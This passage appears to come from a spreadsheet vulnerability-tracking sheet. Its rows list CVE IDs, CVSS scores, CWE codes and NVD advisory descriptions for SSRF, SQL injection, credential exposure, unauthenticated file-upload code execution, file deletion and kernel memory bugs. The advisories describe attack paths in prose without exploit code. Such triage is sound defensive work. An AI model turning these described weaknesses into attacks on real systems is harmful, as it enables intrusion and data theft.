          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100589</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100391</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>MediaFlow Proxy through 2.4.9 contains a server-side request forgery vulnerability in the /proxy routes due to missing and incomplete destination validation in the d query parameter. Remote attackers can supply arbitrary internal URLs including loopback and cloud metadata endpoints to read full responses from the proxy server.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100391</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100567</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is an agent gateway distributed as the npm package 'openclaw'. In versions &gt;= 2026.4.5 and &lt; 2026.8.1, the Gateway validated a single DNS resolution result for a configured remote Chrome DevTools Protocol (CDP) hostname, but the raw WebSocket and Playwright transports performed a later, independent DNS resolution, discarding the DNS pinning enforced at validation time. An attacker who controls an approved CDP hostname or its DNS answers can exploit this check-then-use gap via DNS rebinding to make the Gateway connect to a loopback, private, link-local, cloud metadata, or other SSRF-policy-denied address. The impact depends on the remote CDP configuration, DNS timing, and the services reachable from the Gateway host. The issue is fixed in 2026.8.1; as a mitigation, disable hostname-based remote CDP endpoints or restrict them to trusted, stable infrastructure.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100567</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67236</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-312</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.2.8 and 4.3.2, a successful POST /login caused is_authorized/2 to set an auth cookie containing base64-encoded username:password credentials without HttpOnly, Secure, SameSite, or expiration protections. Because base64 is encoding rather than encryption, an attacker with same-origin cross-site scripting, an HTTP-readable network position, or local access to the browser cookie store could recover the actual login credentials; older browsers that treated an absent SameSite attribute as None also sent the cookie cross-site. This issue is fixed in versions 4.2.8 and 4.3.2.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67236</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67409</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-252</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 4.3.3, 4.2.9, 4.1.14, 4.0.23, and 3.13.18, JWKS Fetch Ignores HTTP Response Status Code - Signing Key Destruction Causes Authentication DoS (CWE-252). the JWKS key fetching mechanism in uaajwt.erl does not validate the HTTP response status code when downloading signing keys from the OAuth2 provider's JWKS endpoint. Non-200 responses (including 4xx and 5xx errors) are processed identically to successful responses. When the JWKS endpoint returns an error response with a valid-JSON body that lacks a keys field, all previously cached signing keys are destroyed, causing a persistent authentication denial of Files: deps/rabbitmqauthbackendoauth2/src/uaajwt.erl, lines 50-63 deps/rabbitmqauthbackendoauth2/src/uaajwks.erl, lines 5-7 deps/rabbitmqauthbackendoauth2/src/rabbitoauth2provider.erl, lines 98-107 Bug 1: HTTP status code ignored (uaajwt.erl:50-63): The Erlang httpc module returns {ok, {{HttpVersion, StatusCode, ReasonPhrase}, Headers, Body}}. The pattern {ok, {, , JwksBody}} matches ANY successful HTTP transaction Persistent authentication DoS: Once keys are destroyed, ALL OAuth2/JWT authentication fails for all users until a new successful JWKS refresh occurs Amplification: A single attacker can deny access to all legitimate OAuth2 users across the entire RabbitMQ. This issue is fixed in versions 4.3.3, 4.2.9, 4.1.14, 4.0.23, and 3.13.18.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67409</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67410</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.3.3 and 4.2.9, OAuth2 Client Secret Exposed via Unauthenticated JavaScript Endpoint (CWE-200). when OAuth2 authentication is enabled for the RabbitMQ Management UI and the configured flow, IDP use a client secret, the oauthclientsecret configuration value is included in the JavaScript served by the unauthenticated endpoint /js/oidc-oauth/bootstrap.js. Any user who can reach the management UI port can retrieve the OAuth2 client secret without Files: deps/rabbitmqmanagement/src/rabbitmgmtwmauth.erl, line 186 deps/rabbitmqmanagement/src/rabbitmgmtoauthbootstrap.erl, lines 35-50 deps/rabbitmqmanagement/src/rabbitmgmtdispatcher.erl, lines 45-49 (route registration) Code Path: 1. The route /js/oidc-oauth/bootstrap.js is registered as a plain Cowboy handler (rabbitmgmtdispatcher.erl:46): Credential exposure for the affected configuration: OAuth2 client secret is accessible without any authentication Token theft: Attacker can complete the authorization code flow using stolen authorization codes Client impersonation: Attacker can make requests. Any RabbitMQ deployment with: This issue is fixed in versions 4.3.3 and 4.2.9.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67410</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97525</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr"/>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/mm/pat: Allocate split page tables as kernel page tables
A PTE is allocated directly without going through the standard page table
allocation routines (such as pte_alloc_one_kernel()) when the CPA code
splits a large page (__split_large_page()).
This means the page table constructor is never called nor is the page table
marked as a kernel page table.
The former results in the folio associated with the page table not being
marked as a page table (__pagetable_ctor() is never called thus neither is
__folio_set_pgtable()) nor are statistics updated to reflect
it (lruvec_stat_add_folio() is never called).
The latter issue of failing to mark the page table as a kernel page
table (ptdesc_set_kernel() is never called) is far more problematic.
Since commit:
  5ba2f0a15564 ("mm: introduce deferred freeing for kernel page tables")
kernel page table freeing has been batched and since the
subsequent commit:
  e37d5a2d60a3 ("iommu/sva: invalidate stale IOTLB entries for kernel address space")
IOTLB cache entries for kernel page tables have been invalidated upon
being freed.
Since split page tables are freed without this invalidation, the IOTLB
can contain stale entries for them.
Resolve the issue by using the ordinary PTE allocation API at split time.
This results in these kernel page tables invoking a page table constructor,
and thus requires a page table destructor.
Destructors are not always present, like for early allocated direct map
page tables). Conditionally call pagetable_dtor_free() if the PG_table
folio flag for the ptdesc is set, otherwise we free the page table via
pagetable_free().
Regardless of which path is taken page tables marked as kernel page tables,
which now includes split page tables, take the correct route through
pagetable_free_kernel().
There is a user-visible side effect in that split page tables will appear
in nr_page_table_pages in /proc/vmstat (as do other kernel page tables
allocated after early boot), however this is a positive change.
This issue started being markedly problematic after commit:
  5ba2f0a15564 ("mm: introduce deferred freeing for kernel page tables")
so choose this as the Fixes target.
[ dhansen: rephrase in imperative mood ]</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97525</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100387</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>pgPointcloud through 1.2.5 contains a heap out-of-bounds read vulnerability in dimensional patch WKB deserialization that allows authenticated database users to read adjacent heap memory. Attackers can supply crafted pcpatch values with attacker-controlled size fields to copy heap memory into stored patches for exfiltration or crash the PostgreSQL backend.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100387</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100389</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>GestSup versions before 3.2.61 contain a remote code execution vulnerability in the basic IMAP connector's attachment handling that fails to skip blocked file extensions. Unauthenticated attackers can send emails with PHP attachments to monitored mailboxes, which are written to the web-accessible upload/ticket directory and executed when accessed.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100389</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100532</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr">
        <is>
          <t>sap, npm, gin</t>
        </is>
      </c>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>@openclaw/whatsapp (npm) before 2026.8.1 exposes the WhatsApp login tool through the generic channel-tool path without preserving the originating sender's owner status, so the owner-only tool boundary is not enforced. An admitted non-owner sender able to steer the tool can request a forced login and receive a new QR code for a configured account, disconnecting the Gateway's WhatsApp account and causing loss of availability; full account relinking additionally requires the attacker to scan the returned QR code with another phone. The issue affects the owner-only tool boundary rather than WhatsApp transport authentication. Fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100532</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44642</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t>Piwigo is a full featured open source photo gallery application for the web. Prior to 16.4.0, check_upgrade_access_rights() in admin/include/functions_upgrade.php conditionally escapes the submitted username only when the removed get_magic_quotes_gpc function exists, so PHP 8 and later concatenate an unauthenticated username directly into the upgrade authentication SQL query. When database upgrades are pending, a crafted query result can satisfy the status and password checks, set PHPWG_IN_UPGRADE, and authorize upgrade execution without valid administrator credentials. This can cause unauthorized database integrity changes and service disruption. This vulnerability is fixed in 16.4.0.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44642</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51773</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr">
        <is>
          <t>vmware</t>
        </is>
      </c>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>An issue in the VMware datastore driver of OpenStack glance_store. When an authenticated attacker provides a maliciously crafted image location URI pointing to an external server, the _retry_request function fails to validate the destination host before attaching sensitive authentication headers.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51773</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92713</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>The Modula Image Gallery – Photo Grid &amp; Video Gallery plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the upload_image function in all versions up to, and including, 3.0.2. This makes it possible for authenticated attackers, with author-level access and above, to delete arbitrary files on the server. The path restriction to wp-content/uploads is not an effective ownership boundary, as all user attachment files reside within that tree, and Authors trivially satisfy the edit_post check on their own galleries.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92713</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97570</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr"/>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Bound SW TPA IDs to prevent crashes
FW supports up to 1024 concurrent TPAs, so the FW TPA ID is in the range
0..1023 (see commit ec4d8e7cf024 ("bnxt_en: Add TPA ID mapping logic for
57500 chips.")). bnxt_alloc_agg_idx is intended to wrap the FW ID down to a
software ID which is used to index rxr-&gt;rx_tpa, and to generate a mapping
between FW IDs and the wrapped software ID.
On a 57608 with firmware version 233, the firmware advertises 32
concurrent TPAs. As of the commit under fixes, bp-&gt;max_tpa on this NIC
is set to 32.
If the software ID from bnxt_alloc_agg_idx is above 31, this results in
an invalid address being loaded on this line:
  tpa_info = &amp;rxr-&gt;rx_tpa[agg_id];
because rx_tpa is allocated with only bp-&gt;max_tpa (32) entries. Writes
to tpa_info later in the code are out of bounds.
This bug results in a crash at boot:
Oops: general protection fault, kernel NULL pointer dereference 0x8: 0000 [#1] SMP NOPTI
RIP: 0010:bnxt_rx_pkt+0xc0/0x1560
RSP: 0018:ffffc900009b8c78 EFLAGS: 00010246
RAX: 0000000000000000 RBX: 0000000000000048 RCX: 0000000206682516
RDX: ffffc900009b8db4 RSI: 0000000000000000 RDI: 01ffffff038fe1c0
RBP: ffffc9006e687480 R08: ffffc9006e687000 R09: 0000000000003048
R10: 0000000000000480 R11: ffff8881c6083900 R12: 0000000006682516
R13: ffff8881c6095400 R14: 0000000000000016 R15: ffff8881c6b66680
FS:  0000000000000000(0000) GS:ffff88fef3c77000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007fc8bda40584 CR3: 000000807c812001 CR4: 0000000008772ef0
PKRU: 55555554
Call Trace:
 &lt;IRQ&gt;
 ? __netif_receive_skb_list_core+0x1ca/0x250
